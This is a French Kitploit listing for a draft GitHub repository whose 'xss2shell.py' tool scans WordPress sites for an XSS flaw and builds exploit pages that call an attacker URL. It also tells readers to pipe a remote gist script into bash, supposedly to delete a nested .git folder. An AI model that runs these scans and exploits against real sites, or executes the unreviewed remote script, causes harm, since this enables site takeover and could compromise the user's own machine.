Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-64638 — CVE-2026-64638 - Brouillon ou À FAIRE | Kitploit
Outils/GitHubGitHub/horkimhab/cve-2026-64638
Scanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubhorkimhab/cve-2026-64638

CVE-2026-64638

CVE-2026-64638 - Brouillon ou À FAIRE

Voir le dépôt
4il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-64638

Faire un don

Soutenez la maintenance de ce projet via PayPal ou en scannant le code QR ci-dessous.

paypal

Code QR pour le don

⚡ Utilisation simple

Utilisez ce projet uniquement dans des environnements sûrs et autorisés, tels que :

  • Machines virtuelles locales
  • Conteneurs Docker
  • Configurations de laboratoire isolées
  • Environnements de test d'intrusion autorisés

Exemple de configuration :

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Exemple d'utilisation :

root@kitploit:~
# 1. Scanning Mode - Detect Vulnerable WordPress Sites:

# Scan a single URL
python xss2shell.py scan http://wp-vm.local

# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt

# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json

# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local

# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/

# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator

Télécharger l’outil

Remarque :

  • Si vous clonez depuis un autre projet, vous devez exécuter curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y pour supprimer le dossier .git imbriqué
  • par ex. : cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Crédit ou référence

  • https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
  • https://pwn.ai/blog/xss2shell

📚 Dépôt de recherche pédagogique en sécurité

Un dépôt pour apprendre, tester et rechercher des concepts de cybersécurité dans des environnements contrôlés.


⚠️ Avertissement de sécurité et mention légale

Objectif

Ce dépôt est destiné uniquement à la recherche en sécurité pédagogique et autorisée.

Il est conçu pour aider les utilisateurs à découvrir :

  • Vulnérabilités de sécurité
  • Concepts de bac à sable (sandbox) et d'isolation
  • Pratiques de codage sécurisé et de défense

Utilisation autorisée uniquement

Utilisez ce dépôt uniquement dans des environnements où vous avez l'autorisation, comme :

  • Laboratoires personnels ou machines virtuelles
  • Environnements Docker ou isolés
  • Tests d'intrusion autorisés
  • Formation en cybersécurité ou recherche académique

Toute utilisation non autorisée ou illégale est strictement interdite.


Aucune responsabilité

L'auteur et les contributeurs ne sont pas responsables des dommages, utilisations abusives, problèmes juridiques ou pertes causés par ce projet.

En utilisant ce dépôt, vous acceptez que :

  • Vous êtes responsable de vos propres actions
  • Vous l'utiliserez légalement et de manière éthique
  • Le projet est fourni sans garantie

Utilisation éthique

Ce projet est conçu pour :

  • Recherche en sécurité défensive
  • Éducation à la cybersécurité
  • Sensibilisation aux vulnérabilités
  • Recherche sur les systèmes et logiciels sécurisés

Veuillez suivre les pratiques de divulgation responsable et vous conformer à toutes les lois applicables.


Contact

Pour une divulgation responsable ou une collaboration, contactez le mainteneur du dépôt via GitHub.